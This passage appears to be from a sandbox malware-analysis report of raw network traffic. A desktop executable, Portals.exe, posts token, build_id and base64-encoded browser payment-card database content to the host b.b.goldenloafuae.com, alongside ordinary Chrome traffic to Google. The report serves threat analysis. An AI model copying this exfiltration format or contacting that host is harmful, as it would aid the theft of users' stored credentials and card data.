                                                                                                                                                                                                    2025-03-13 17:02:58 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:02:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:02:59 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2025-03-13 17:02:59 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    12192.168.2.44976394.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:03:00 UTC297OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----ymg4wtrqqimozuaiek6p
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Content-Length: 186149
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:03:00 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 79 6d 67 34 77 74 72 71 71 69 6d 6f 7a 75 61 69 65 6b 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 61 66 39 63 65 35 34 31 64 37 65 63 31 65 65 63 66 30 34 38 34 31 63 31 35 36 61 32 65 0d 0a 2d 2d 2d 2d 2d 2d 79 6d 67 34 77 74 72 71 71 69 6d 6f 7a 75 61 69 65 6b 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 33 32 34 37 31 64 65 38 33 32 33 63 36 36 64 65 34 33 65 62 38 33 31 33 65 38 30 36 66 65 61 0d 0a 2d 2d 2d 2d 2d 2d 79 6d 67 34 77 74 72 71 71 69 6d 6f 7a 75 61 69 65 6b 36 70 0d 0a 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ------ymg4wtrqqimozuaiek6pContent-Disposition: form-data; name="token"e92af9ce541d7ec1eecf04841c156a2e------ymg4wtrqqimozuaiek6pContent-Disposition: form-data; name="build_id"a32471de8323c66de43eb8313e806fea------ymg4wtrqqimozuaiek6pCont
                                                                                                                                                                                                    2025-03-13 17:03:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:03:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:03:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:03:00 UTC16355OUTData Raw: 66 64 47 56 34 64 43 42 57 51 56 4a 44 53 45 46 53 4c 43 42 31 63 32 46 6e 5a 56 39 70 62 6e 4e 30 63 6e 56 6a 64 47 6c 76 62 6e 4e 66 64 47 56 34 64 43 42 57 51 56 4a 44 53 45 46 53 4b 59 46 30 47 41 63 58 52 55 55 42 67 6d 74 30 59 57 4a 73 5a 58 4e 6c 63 6e 5a 6c 63 6c 39 6a 59 58 4a 6b 58 32 4e 73 62 33 56 6b 58 33 52 76 61 32 56 75 58 32 52 68 64 47 46 7a 5a 58 4a 32 5a 58 4a 66 59 32 46 79 5a 46 39 6a 62 47 39 31 5a 46 39 30 62 32 74 6c 62 6c 39 6b 59 58 52 68 48 45 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 5a 58 4a 32 5a 58 4a 66 59 32 46 79 5a 46 39 6a 62 47 39 31 5a 46 39 30 62 32 74 6c 62 6c 39 6b 59 58 52 68 49 43 68 70 5a 43 42 57 51 56 4a 44 53 45 46 53 4c 43 42 7a 64 57 5a 6d 61 58 67 67 56 6b 46 53 51 30 68 42 55 69 77 67 5a 58
                                                                                                                                                                                                    Data Ascii: fdGV4dCBWQVJDSEFSLCB1c2FnZV9pbnN0cnVjdGlvbnNfdGV4dCBWQVJDSEFSKYF0GAcXRUUBgmt0YWJsZXNlcnZlcl9jYXJkX2Nsb3VkX3Rva2VuX2RhdGFzZXJ2ZXJfY2FyZF9jbG91ZF90b2tlbl9kYXRhHENSRUFURSBUQUJMRSBzZXJ2ZXJfY2FyZF9jbG91ZF90b2tlbl9kYXRhIChpZCBWQVJDSEFSLCBzdWZmaXggVkFSQ0hBUiwgZX
                                                                                                                                                                                                    2025-03-13 17:03:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:03:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:03:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:03:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:03:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                    2025-03-13 17:03:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:03:02 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    13192.168.2.449769142.250.186.1324432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC516OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJWhywEInP7MAQiFoM0BCOipzgEIydHOAQi+1c4BCIHWzgEIwNjOAQjI3M4BCIrgzgEIruTOAQiL5c4B
                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC1055INHTTP/1.1 200 OK
                                                                                                                                                                                                    Version: 735763701
                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                    Accept-CH: Downlink
                                                                                                                                                                                                    Accept-CH: RTT
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:03:04 GMT
                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC323INData Raw: 32 33 33 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 46 61 20 67 62 5f 32 64 20 67 62 5f 50 65 20 67 62 5f 72 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                    Data Ascii: 2334)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC1378INData Raw: 5c 75 30 30 33 64 5c 22 67 62 5f 6c 64 20 67 62 5f 70 64 20 67 62 5f 48 64 20 67 62 5f 6d 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 73 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4b 63 20 67 62 5f 52 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c
                                                                                                                                                                                                    Data Ascii: \u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC1378INData Raw: 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 39 63 20 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 62 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76
                                                                                                                                                                                                    Data Ascii: span\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_xd gb_9c gb_ad\"\u003e\u003cspan class\u003d\"gb_vd\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_bd\"\u003e \u003c\/div
                                                                                                                                                                                                    2025-03-13 17:03:04 UTC1378INData Raw: 30 30 33 64 5c 22 5f 74 6f 70 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32
                                                                                                                                                                                                    Data Ascii: 003d\"_top\" role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_E\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-2
